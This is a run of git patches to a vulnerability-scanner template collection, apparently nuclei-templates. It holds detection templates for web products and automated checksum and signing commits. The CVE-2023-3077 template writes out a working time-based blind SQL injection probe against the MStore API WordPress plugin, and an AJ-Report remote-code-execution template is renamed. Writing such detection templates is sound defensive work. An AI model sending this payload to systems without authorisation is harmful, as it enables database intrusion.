@@ -2,7 +2,7 @@ id: default-oracle-application-page info: name: Oracle Application Server Containers - author: dhiyaneshDk + author: dhiyaneshDk,righettod severity: info metadata: max-request: 1 @@ -17,7 +17,12 @@ http: matchers: - type: word words: - - "Oracle Application Server Containers for J2EE 10g" + - "Oracle Application Server" part: body -# digest: 4b0a00483046022100b5780eb561a58f9d667836c535ca4bb787b2a83dab8870ef6e82a6760499f5ab022100f615f1b3ea1b9d9096cf240a0920aeab2287005c10cfe2b5241c9be736cb424b:922c64590222798bb761d5b6d8e72950 + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)\s+\(([0-9.]+)\)' From a3a18c55b239711889ad344a52b53855d075e049 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 27 May 2024 18:36:43 +0000 Subject: [PATCH 1380/1768] Auto Generated Templates Checksum [Mon May 27 18:36:43 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 920a31834a..eb48ea87af 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2916,7 +2916,7 @@ http/cves/2023/CVE-2023-20073.yaml:2f3e6872656d3f4428b063cf071c2b2490a0d0dd http/cves/2023/CVE-2023-2009.yaml:bb71de754a3ece32e5eca69ecd358e30f88f742b http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 http/cves/2023/CVE-2023-2023.yaml:521a587d1d6ebb7014e0800bf4f7a89a66e4bff5 -http/cves/2023/CVE-2023-2059.yaml:98c1b62d9f6b0892241c35c396508d7efe868e28 +http/cves/2023/CVE-2023-2059.yaml:856fa67098cc6c0abe1bb0921e4dd4205bd017ee http/cves/2023/CVE-2023-20864.yaml:39eebb5c215549237a86a0446e07210bc37b47d4 http/cves/2023/CVE-2023-20887.yaml:ed50cf91b29dcdf6a78a4e524805ac4758ea41da http/cves/2023/CVE-2023-20888.yaml:99b2bd7f57dedcd0a4fa003660be6817b734806f @@ -6972,7 +6972,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:4927d380410beb3d0274f8d51acdd78d2924f74e +http/technologies/tech-detect.yaml:33e4cb0e7c7275085251281fc8269241ae77bf77 http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -8566,7 +8566,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9e685fe1f19fa2f9e2b049a93aae38fd8ceae314 +templates-checksum.txt:9d9ebfedd3e3e99fbb61fea2e509e60e3fd09636 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d4816d5b7d5ee8f9963dd7e6a9de8ae42970378e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 27 May 2024 18:38:13 +0000 Subject: [PATCH 1382/1768] Auto Generated Templates Checksum [Mon May 27 18:38:13 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index eb48ea87af..c570b26afc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6896,7 +6896,7 @@ http/technologies/openproject-detect.yaml:91c1e50d8a05629807ab0f013c664e6edf7f1e http/technologies/openresty-detect.yaml:255ca922fa6904e6ea0bb314d24516bce3204e96 http/technologies/openssl-detect.yaml:3dedd81330e4f4ae3b6ae11b429e4e0bd5b8580d http/technologies/operations-automation-default-page.yaml:166d229fff5150b81bd81ce6db4c4078bdcff0d5 -http/technologies/oracle/default-oracle-application-page.yaml:bc4104ffab5e1988193399109e560d90d06b4073 +http/technologies/oracle/default-oracle-application-page.yaml:e8f83225d2a9f60f31fedf9cc9f76dd7edd0531e http/technologies/oracle/oracle-access-manager-detect.yaml:f4287a567c96e6f4ec9da0a832d8691b4b681a7f http/technologies/oracle/oracle-atg-commerce.yaml:f8279ae12859c82558baae4d9df611b74bd875e1 http/technologies/oracle/oracle-dbass-detect.yaml:b8eb13459d727a34bde146f1265c28a71e14c90b @@ -8566,7 +8566,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9d9ebfedd3e3e99fbb61fea2e509e60e3fd09636 +templates-checksum.txt:f41a35ec5b35d3ea6df3bf44a7b74a8b96fd20c5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 910f87df3aba174bd400ec7be38b69568daf5358 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 27 May 2024 18:38:32 +0000 Subject: [PATCH 1383/1768] Auto Template Signing [Mon May 27 18:38:32 UTC 2024] :robot: --- http/technologies/tech-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 5348890da9..21d19515ab 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -3726,3 +3726,4 @@ http: part: server words: - "istio-envoy" +# digest: 4b0a00483046022100ba8d6eae9311c902babb5fce09a84ba79bb0317dbf6caca514245e0c60a3b3520221009ce0d2c9c1144d45590bfed8ab4c81f6bde45a053a2b3156d25bdb4aba006253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fc1914cbbdfc9ca22fb80ca7d04ebfce83c61b45 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 May 2024 07:11:44 +0530 Subject: [PATCH 1384/1768] minor update --- http/vulnerabilities/other/array-vpn-lfi.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml index 50af402872..23520f30de 100644 --- a/http/vulnerabilities/other/array-vpn-lfi.yaml +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -10,6 +10,8 @@ info: - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: fofa-query: product="Array-VPN" + max-request: 1 + verified: true tags: lfi,vpn,arrayvpn http: From e08f8d384227274471676001648c2145966bcb80 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 28 May 2024 01:46:54 +0000 Subject: [PATCH 1385/1768] Auto Generated New Template Addition List [Tue May 28 01:46:54 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6a7b50cdfe..f7f5cc81ea 100644 --- a/.new-additions +++ b/.new-additions @@ -5,4 +5,5 @@ http/cves/2024/CVE-2024-21683.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 7e622c7fc9849befa3a6fbf8ef9ae347c3317939 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 May 2024 01:47:03 +0000 Subject: [PATCH 1386/1768] Auto Generated Templates Checksum [Tue May 28 01:47:03 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c570b26afc..3a2d1fce4c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6972,7 +6972,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:33e4cb0e7c7275085251281fc8269241ae77bf77 +http/technologies/tech-detect.yaml:8da8bdae62f4f497e27b797a3571dab0e2c7e579 http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -7662,6 +7662,7 @@ http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:ec53fcff7689e47418ad652a41c http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b785a4339900d594a http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e +http/vulnerabilities/other/array-vpn-lfi.yaml:815fd8a47429b3667da9fe4bb5986f73d21f082a http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a70a1f364de32d5 @@ -8566,7 +8567,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f41a35ec5b35d3ea6df3bf44a7b74a8b96fd20c5 +templates-checksum.txt:89cafe981b94a4525cc814c66be575cfe5abc528 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9e49fb01bb7772c99bb76739be17520819384a7c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 28 May 2024 01:47:34 +0000 Subject: [PATCH 1387/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0968c201b8..aa09be641f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: jobs: From 1f26a2985eb9425b26d618f6e3246178371e670c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 May 2024 01:48:48 +0000 Subject: [PATCH 1388/1768] Auto Template Signing [Tue May 28 01:48:48 UTC 2024] :robot: --- http/technologies/oracle/default-oracle-application-page.yaml | 1 + http/vulnerabilities/other/array-vpn-lfi.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/technologies/oracle/default-oracle-application-page.yaml b/http/technologies/oracle/default-oracle-application-page.yaml index 3613c92279..4c0914ebfb 100644 --- a/http/technologies/oracle/default-oracle-application-page.yaml +++ b/http/technologies/oracle/default-oracle-application-page.yaml @@ -26,3 +26,4 @@ http: group: 1 regex: - '(?i)\s+\(([0-9.]+)\)' +# digest: 4a0a0047304502203709028b7add9432a486624c46eee996bbd06f8f692272b6cc7fe0aa4fa8fcbf02210089d3596b1bd759c78e613b064c1eca34fb40bc6cccead5c23eb7f6a2d7535c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml index 23520f30de..c8dc14a1bb 100644 --- a/http/vulnerabilities/other/array-vpn-lfi.yaml +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -37,3 +37,4 @@ http: - type: status status: - 401 +# digest: 4a0a004730450221008e24fbcfd7c890e4d363e7fe8e26af87384d919f31b0f80cfac8b2386af6805e0220028f7843b763f24105d68d24ebe88411ed598df53806c37d1a126ce23eb55405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5f9b94ac414678cacb029fd9760cb23b6a5b5cde Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 May 2024 07:20:55 +0530 Subject: [PATCH 1389/1768] minor update --- .../aj-report-rce.yaml => cnvd/2024/CNVD-2024-15077.yaml} | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename http/{vulnerabilities/other/aj-report-rce.yaml => cnvd/2024/CNVD-2024-15077.yaml} (90%) diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml similarity index 90% rename from http/vulnerabilities/other/aj-report-rce.yaml rename to http/cnvd/2024/CNVD-2024-15077.yaml index a39694e3c4..983f977fa1 100644 --- a/http/vulnerabilities/other/aj-report-rce.yaml +++ b/http/cnvd/2024/CNVD-2024-15077.yaml @@ -1,4 +1,4 @@ -id: aj-report-rce +id: CNVD-2024-15077 info: name: AJ-Report Open Source Data Screen - Remote Code Execution @@ -8,9 +8,12 @@ info: AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious. reference: - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + - https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md metadata: + verified: true + max-request: 1 fofa-query: title="AJ-Report" - tags: aj-report,rce + tags: cnvd,cnvd2024,aj-report,rce http: - raw: From b83355811f22ab961d101ed76b4323782a6f06fa Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 28 May 2024 01:55:33 +0000 Subject: [PATCH 1390/1768] Auto Generated New Template Addition List [Tue May 28 01:55:33 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f7f5cc81ea..5c7d43d121 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cnvd/2024/CNVD-2024-15077.yaml http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-48084.yaml From 9a48bba8793d6c2ae032e2d86ad894fdceb8a038 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 May 2024 01:55:43 +0000 Subject: [PATCH 1391/1768] Auto Generated Templates Checksum [Tue May 28 01:55:43 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3a2d1fce4c..da10a12ff7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -878,6 +878,7 @@ http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 +http/cnvd/2024/CNVD-2024-15077.yaml:887e7fe81022c33cab23d055b11a056f2954ce3e http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:8362d36f1fa45da68449901d392ba84be2f4a368 http/credential-stuffing/cloud/atlassian-login-check.yaml:18f7078d79a54b1741f82227ef0ffad50287ba20 @@ -6896,7 +6897,7 @@ http/technologies/openproject-detect.yaml:91c1e50d8a05629807ab0f013c664e6edf7f1e http/technologies/openresty-detect.yaml:255ca922fa6904e6ea0bb314d24516bce3204e96 http/technologies/openssl-detect.yaml:3dedd81330e4f4ae3b6ae11b429e4e0bd5b8580d http/technologies/operations-automation-default-page.yaml:166d229fff5150b81bd81ce6db4c4078bdcff0d5 -http/technologies/oracle/default-oracle-application-page.yaml:e8f83225d2a9f60f31fedf9cc9f76dd7edd0531e +http/technologies/oracle/default-oracle-application-page.yaml:33805aa961eccd1f7b628fb5877f54478f5065ea http/technologies/oracle/oracle-access-manager-detect.yaml:f4287a567c96e6f4ec9da0a832d8691b4b681a7f http/technologies/oracle/oracle-atg-commerce.yaml:f8279ae12859c82558baae4d9df611b74bd875e1 http/technologies/oracle/oracle-dbass-detect.yaml:b8eb13459d727a34bde146f1265c28a71e14c90b @@ -7662,7 +7663,7 @@ http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:ec53fcff7689e47418ad652a41c http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b785a4339900d594a http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e -http/vulnerabilities/other/array-vpn-lfi.yaml:815fd8a47429b3667da9fe4bb5986f73d21f082a +http/vulnerabilities/other/array-vpn-lfi.yaml:50b84caddedf1b89afcba09bd5cbbdcfb0005897 http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a70a1f364de32d5 @@ -8567,7 +8568,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:89cafe981b94a4525cc814c66be575cfe5abc528 +templates-checksum.txt:6d4e5de5e32a68caa7c038ae0546baf678dd280c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 26c69a4b117e2b5ea44bcaa8f01568dbe744ac64 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 28 May 2024 01:56:17 +0000 Subject: [PATCH 1392/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index aa09be641f..c531aa033b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cnvd/2024/CNVD-2024-15077.yaml' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' From 52c2e81d8b476cfceba3c0be798a9986e0644858 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 May 2024 01:57:29 +0000 Subject: [PATCH 1393/1768] Auto Template Signing [Tue May 28 01:57:29 UTC 2024] :robot: --- http/cnvd/2024/CNVD-2024-15077.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cnvd/2024/CNVD-2024-15077.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml index 983f977fa1..204334b5b4 100644 --- a/http/cnvd/2024/CNVD-2024-15077.yaml +++ b/http/cnvd/2024/CNVD-2024-15077.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f53cb46e15663e3740bfc447e0adeeba1a90cc10 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 May 2024 07:38:36 +0530 Subject: [PATCH 1394/1768] Create CVE-2023-3077.yaml --- http/cves/2023/CVE-2023-3077.yaml | 53 +++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2023/CVE-2023-3077.yaml diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml new file mode 100644 index 0000000000..bb7b1b3fb1 --- /dev/null +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -0,0 +1,53 @@ +id: CVE-2023-3077 + +info: + name: MStore API < 3.9.8 - Unauthenticated Blind SQL Injection + author: DhiyaneshDK + severity: critical + description: | + The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter. + impact: | + Allows an attacker to extract sensitive data from the database + remediation: | + Update MStore API WordPress Plugin to the latest version to mitigate the vulnerability + reference: + - https://wpscan.com/vulnerability/9480d0b5-97da-467d-98f6-71a32599a432 + - https://nvd.nist.gov/vuln/detail/CVE-2023-3077 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3077 + epss-score: 0.00148 + epss-percentile: 0.50816 + cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* + metadata: + verified: treu + vendor: inspireui + product: mstore_api + framework: wordpress + publicwww-query: "/wp-content/plugins/mstore-api/" + tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + matchers: + - type: dsl + internal: true + dsl: + - 'status_code == 200' + - 'contains(body, "MStore API")' + condition: and + + - method: GET + path: + - "{{BaseURL}}/wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+-" + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + condition: and From eac0581ccbfee6cb94759a4e4127e438f1bfaeac Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 May 2024 07:44:39 +0530 Subject: [PATCH 1395/1768] Create openemr-setup-installer.yaml --- .../installer/openemr-setup-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/openemr-setup-installer.yaml diff --git a/http/misconfiguration/installer/openemr-setup-installer.yaml b/http/misconfiguration/installer/openemr-setup-installer.yaml new file mode 100644 index 0000000000..d4675908b6 --- /dev/null +++ b/http/misconfiguration/installer/openemr-setup-installer.yaml @@ -0,0 +1,31 @@ +id: openemr-setup-installer + +info: + name: OpenEMR Setup Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed OpenEMR setup installation pages which could allow unauthorized access or information disclosure. + reference: + - https://www.open-emr.org/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"OpenEMR Setup Tool" + tags: misconfig,install,exposure,openemr + +http: + - method: GET + path: + - "{{BaseURL}}/setup.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>OpenEMR Setup Tool" + + - type: status + status: + - 200 From 7e83c80f02ca4bf07157d035e52b630fb56c715d Mon Sep 17 00:00:00 2001 From: dcruzec Date: Mon, 27 May 2024 23:08:23 -0400 Subject: [PATCH 1396/1768] Add files via upload --- .../cisco-firepower-management-login.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/exposed-panels/cisco-firepower-management-login.yaml diff --git a/http/exposed-panels/cisco-firepower-management-login.yaml b/http/exposed-panels/cisco-firepower-management-login.yaml new file mode 100644 index 0000000000..678a510158 --- /dev/null +++ b/http/exposed-panels/cisco-firepower-management-login.yaml @@ -0,0 +1,37 @@ +id: cisco-firepower-management-login + +info: + name: Cisco Firepower Management Center login - Detect + author: Charles D + severity: info + description: Cisco Firepower Management Centerlogin panel was detected + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: html:"cisco firepower management" + tags: console,login,cisco + +http: + - method: GET + path: + - '{{BaseURL}}/ui/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Cisco Firepower Management Center" + part: body + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" \ No newline at end of file From 5a015ead7b354bf1b90580362d3d08f56f975884 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Tue, 28 May 2024 11:16:01 +0800 Subject: [PATCH 1397/1768] Add Gotweb detect --- http/technologies/gotweb-detect.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/technologies/gotweb-detect.yaml diff --git a/http/technologies/gotweb-detect.yaml b/http/technologies/gotweb-detect.yaml new file mode 100644 index 0000000000..63ee6d8b9d --- /dev/null +++ b/http/technologies/gotweb-detect.yaml @@ -0,0 +1,28 @@ +id: gotweb-detect + +info: + name: GotWeb Detect + author: lu4nx + severity: info + description: | + Game of Trees (Got) is a version control system which prioritizes ease of use and simplicity over flexibility. + metadata: + max-request: 1 + zoomeye-query: 'href="/gotweb.css"' + tags: tech,got,gotweb + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - + + - type: status + status: + - 200 From da4ec60ac5f264a2f3fbcb395f964993b55da84f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:36:36 +0530 Subject: [PATCH 1398/1768] minor update --- http/technologies/gotweb-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/gotweb-detect.yaml b/http/technologies/gotweb-detect.yaml index 63ee6d8b9d..d4c2959378 100644 --- a/http/technologies/gotweb-detect.yaml +++ b/http/technologies/gotweb-detect.yaml @@ -7,6 +7,7 @@ info: description: | Game of Trees (Got) is a version control system which prioritizes ease of use and simplicity over flexibility. metadata: + verified: true max-request: 1 zoomeye-query: 'href="/gotweb.css"' tags: tech,got,gotweb From 247527efad94d6a93e6ae1ab7d8e7a7c363edee8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:42:36 +0530 Subject: [PATCH 1399/1768] Update and rename cisco-firepower-management-login.yaml to cisco-firepower-panel.yaml --- ...t-login.yaml => cisco-firepower-panel.yaml} | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) rename http/exposed-panels/{cisco-firepower-management-login.yaml => cisco-firepower-panel.yaml} (71%) diff --git a/http/exposed-panels/cisco-firepower-management-login.yaml b/http/exposed-panels/cisco-firepower-panel.yaml similarity index 71% rename from http/exposed-panels/cisco-firepower-management-login.yaml rename to http/exposed-panels/cisco-firepower-panel.yaml index 678a510158..37da40469f 100644 --- a/http/exposed-panels/cisco-firepower-management-login.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -1,30 +1,34 @@ -id: cisco-firepower-management-login +id: cisco-firepower-panel info: name: Cisco Firepower Management Center login - Detect author: Charles D severity: info - description: Cisco Firepower Management Centerlogin panel was detected + description: | + Cisco Firepower Management Centerlogin panel was detected classification: cvss-metrics: 